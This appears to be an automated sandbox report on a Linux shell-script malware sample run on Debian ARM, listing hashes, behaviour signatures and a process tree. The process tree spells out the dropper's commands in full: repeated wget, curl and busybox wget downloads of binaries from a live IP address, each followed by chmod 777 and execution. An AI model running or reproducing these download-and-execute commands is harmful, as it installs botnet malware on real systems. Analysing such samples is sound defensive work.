Analysis
-
max time kernel
22s -
max time network
36s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
18/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
-
Size
10KB
-
MD5
91ccaeb90f7a1a486a1a1cc72526a2c5
-
SHA1
f4eae2ed37483fd578a41a4edaa29af24ebe85be
-
SHA256
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3
-
SHA512
beb4e0fafb2bc99022e6595d1f0d0e57cd49ae6da6196c900d45f9b3405d9b6a256070fdaf21fff922ed583c8021f0625d81a56fe82e4c7c28ecf1a5578e2d21
-
SSDEEP
192:mploN9In4UdM0DP0B51+JJRzBKOKBiyaploN9s4UdM0XOKBiyX51+JJv7:mploN9In4UdM0DP0EzBBploN9s4UdM0+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process
723 chmod
771 chmod
825 chmod
843 chmod
874 chmod
694 chmod
805 chmod
819 chmod
837 chmod
849 chmod
861 chmod
867 chmod
686 chmod
706 chmod
763 chmod
787 chmod
831 chmod
855 chmod
746 chmod
-
Executes dropped EXE 19 IoCs
-
Checks CPU configuration 1 TTPs 19 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process
File opened for reading /proc/cpuinfo curl
-
description ioc Process
File opened for reading /proc/self/auxv curl
File opened for reading /proc/sys/crypto/fips_enabled curl
-
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh1⤵PID:656
-
/bin/rm/bin/rm bins.sh2⤵PID:658
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:660
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:682
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:686
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:687
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:688
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:689
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:692
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:693
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:695
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:696
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:697
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:698
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:703
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:708
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:715
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:720
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:726
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:727
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:742
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:761
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:769
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:784
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:801
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:818
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:824
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:830
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:836
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:842
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:848
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:854
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:860
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:866
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:872
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:877
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97